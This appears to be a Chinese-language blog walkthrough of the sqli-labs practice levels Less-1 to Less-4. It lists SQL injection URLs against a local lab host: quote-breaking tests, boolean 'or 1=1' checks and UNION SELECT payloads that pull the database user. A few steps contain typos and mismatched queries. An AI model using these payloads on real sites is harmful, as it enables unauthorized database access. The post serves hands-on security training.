Less1

  1. 开始
    打开 Less1可以看到是这样的
    在这里插入图片描述
    输入
    http://192.168.43.90/Less-1/?id=1
    sql语句是SELECT * FROM users WHERE id=' 1' LIMIT 0,1
    可以看到有显示
    在这里插入图片描述
    输入
    http://192.168.43.90/Less-1/?id= 1 '
    sql语句是SELECT * FROM users WHERE id=' 1'' LIMIT 0,1
    发现错了存在sql注入漏洞
    在这里插入图片描述

判断是字符还是数字
输入http://192.168.43.90/Less-1/?id=1 ' --+ '
sql语句是SELECT * FROM users WHERE id=' 1 '
他没有报错
发现是字符
在这里插入图片描述
输入
http://192.168.43.90/Less-1/?id= 'union select 1,user(),3 --+
可以看到执行成功
在这里插入图片描述

Less2

  1. 开始
    输入
    http://192.168.43.90/Less-2/?id=1
    sql语句是SELECT * FROM users WHERE id=1 LIMIT 0,1
    可以看到有显示在这里插入图片描述
    输入
    http://192.168.43.90/Less-2/?id= 1 '
    sql语句是SELECT * FROM users WHERE id='1' LIMIT 0,1
    发现存在sql注入漏洞
    在这里插入图片描述

判断是字符还是数字
输入http://192.168.43.90/Less-1/?id=2 ' --+ '
sql语句是SELECT * FROM users WHERE id='1 '
发现报错了
发现是数字
在这里插入图片描述
输入http://192.168.43.90/Less-2/?id=null union select 1,user(),3 --+
sql语句是SELECT * FROM users WHERE id=null union select 1,user(),3
在这里插入图片描述

Less3

  1. 开始
    http://192.168.43.90/Less-3/?id= 1
    sql语句是SELECT * FROM users WHERE id=('1') LIMIT 0,1
    在这里插入图片描述
    输入http://192.168.43.90/Less-3d=1/?id=1'
    sql语句是SELECT * FROM users WHERE id=('1'') LIMIT 0,1
    报错发现存在漏洞,可以判断是()
    在这里插入图片描述

输入 http://192.168.43.90/Less-3/?id=1')and (1=1) --+
sql语句是SELECT * FROM users WHERE id=('1')and (1=1)
没有报错,
输入 http://192.168.43.90/Less-3/?id=1')and (1=2) --+
sql语句是SELECT * FROM users WHERE id=('1')and (1=2)
报错了
报错发现存在漏洞在这里插入图片描述
或者输入http://192.168.43.90/Less-3/?id=1 ') or 1=1 --+
sql语句是SELECT * FROM users WHERE id=('1') or 1=1
没有报错
或者输入http://192.168.43.90/Less-3/?id=a ') or 1=1 --+
还是没有报错
报错发现存在漏洞
在这里插入图片描述
输入http://192.168.43.90/Less-3/?id=a ') union select 1,user(),3 --+
漏洞成功被执行

在这里插入图片描述

Less4

Less4和Less3其实是差不多的知道一个是'一个是"